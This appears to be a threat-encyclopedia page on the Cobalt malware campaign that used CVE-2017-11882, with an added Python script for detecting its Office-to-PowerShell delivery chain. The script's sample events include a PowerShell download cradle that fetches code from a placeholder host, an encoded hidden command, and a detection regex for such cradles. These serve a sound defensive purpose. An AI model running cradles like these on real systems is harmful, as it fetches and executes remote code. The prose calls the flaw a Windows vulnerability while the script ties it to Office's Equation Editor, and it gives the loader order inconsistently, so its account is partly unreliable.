Threat Scorecard

Ranking: 3,409
Threat Level: 20 % (Normal)
Infected Computers: 2,143
First Seen: May 5, 2022
Last Seen: May 21, 2023
OS(es) Affected: Windows

Cobalt is a malware infection that spreads by taking advantage of a vulnerability in Microsoft Windows that has existed for 17 years in this operating system. Although the vulnerability used by Cobalt, CVE-2017-11882, has existed for 17 years, it was only made public and patched by Microsoft in November 2017. Using this vulnerability, the cybercrooks were able to deliver threats by means of Cobalt Strike, a legitimate tool built for testing systems for vulnerabilities.

A Cobalt Secret Kept for Many Years

Cobalt is delivered through a spam email message that looks like a notification from Visa (the credit card company), supposedly announcing rule changes in its PayWave service in Russia. Victims receive an RTF document named 'Изменения в системе безопасности.doc Visa payWave.doc,' as well as an archive file with the same name. Sending threats as archive files attached to email messages is a very common delivery method. Password-protecting the archive is a reliable way to keep automated analysis systems from extracting the file in a sandbox and detecting the threat. Including both the corrupted DOC file and the archive in the same message also adds a social engineering aspect, since a victim blocked from opening one attachment is likely to try the other.

When the harmful document used to deliver Cobalt is opened, a PowerShell script runs in the background. This script downloads and installs Cobalt on the victim's computer, allowing the cybercrooks to take control of the infected computer. During the Cobalt attack, several scripts are downloaded and executed in turn before Cobalt itself is installed on the victim's computer. When the CVE-2017-11882 exploit is triggered on the infected computer, an obfuscated JavaScript file is downloaded and executed. This downloads another PowerShell script, which then loads Cobalt directly into memory on the infected computer. While PowerShell scripts can be a powerful way to make using a computer more convenient and efficient, their deep access to the inner workings of the operating system has made them one of the preferred tools used in threat attacks. Since Cobalt is loaded into memory directly and no corrupted DLL file is written to the victim's hard drive, it is more difficult for anti-virus programs to detect that the Cobalt attack is being carried out.
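As an added example that is not part of the original write-up, the following Python script applies detection logic for the delivery chain described above to constructed process-creation events (the pids, image names, paths and command lines are made up). CVE-2017-11882 is a flaw in the Office Equation Editor component, EQNEDT32.EXE, so an Equation Editor or Word process spawning a script host, PowerShell carrying an in-memory download cradle, and a script host spawning PowerShell are the signals checked.

```python
import re

# Constructed process-creation events (pid, parent pid, image, command line);
# they mimic the chain described above and are not real telemetry.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": "WINWORD.EXE", "cmd": "WINWORD.EXE /n report.doc"},
    {"pid": 101, "ppid": 100, "image": "EQNEDT32.EXE", "cmd": "EQNEDT32.EXE -Embedding"},
    {"pid": 102, "ppid": 101, "image": "powershell.exe",
     "cmd": "powershell.exe -w hidden -nop -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.js')"},
    {"pid": 103, "ppid": 102, "image": "wscript.exe", "cmd": "wscript.exe C:\\Users\\Public\\a.js"},
    {"pid": 104, "ppid": 103, "image": "powershell.exe", "cmd": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    # Benign: an administrator running a script from Explorer.
    {"pid": 200, "ppid": 1, "image": "explorer.exe", "cmd": "explorer.exe"},
    {"pid": 201, "ppid": 200, "image": "powershell.exe", "cmd": "powershell.exe -File C:\\admin\\backup.ps1"},
]

# Office processes that should never spawn a script host. CVE-2017-11882 lives in
# the Equation Editor (EQNEDT32.EXE), so that is the parent to watch.
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Command-line markers of an in-memory download cradle (nothing written to disk).
CRADLE = re.compile(r"downloadstring|\biex\b|invoke-expression|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden", re.I)


def chain(events, pid):
    """Walk parent links and return image names from the root ancestor down to pid."""
    by_pid = {e["pid"]: e for e in events}
    names = []
    while pid in by_pid:
        names.append(by_pid[pid]["image"])
        pid = by_pid[pid]["ppid"]
    return list(reversed(names))


def analyze(events):
    """Return (pid, rule) alerts for the Office -> PowerShell -> JS -> PowerShell chain."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        pimg = parent["image"].lower() if parent else ""
        img = e["image"].lower()
        if pimg in OFFICE and img in SCRIPT_HOSTS:
            alerts.append((e["pid"], "office-spawned-script-host"))
        if img == "powershell.exe" and CRADLE.search(e["cmd"]):
            alerts.append((e["pid"], "powershell-download-cradle"))
        if img == "powershell.exe" and pimg in {"wscript.exe", "cscript.exe"}:
            alerts.append((e["pid"], "script-host-spawned-powershell"))
    return alerts
```

Pairing each alert with `chain()` shows the full ancestry (Word, Equation Editor, PowerShell, script host, PowerShell), which is what distinguishes this delivery chain from an administrator's own PowerShell use.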

How the Cobalt Attack can Affect You and Your Machine

Once Cobalt is installed on the victim's computer, it can be used to control the infected computer, as well as to install this threat on other computer systems on the same network. Although Cobalt Strike is officially a tool for penetration testing, in this case it is being used to carry out threat attacks. The cybercrooks are always looking for new ways to deliver threats. While new vulnerabilities are quite threatening, very old vulnerabilities like this one, which may not have been properly addressed originally, also pose a threat to computer users. Remember that many computer users fail to patch their software and operating system regularly, meaning that many PCs remain vulnerable to exploits that are quite old and, in some cases, overlooked by many anti-virus programs.

Protecting Your Computer from a Threat Like Cobalt

As with most threats, the use of a trustworthy security program is the best protection against Cobalt and similar threats. However, since an old software exploit is involved in these attacks, PC security researchers advise computer users to ensure that their software and operating system are fully updated with the most recent security patches. Keeping systems patched does as much to prevent threats and other problems as security software does.
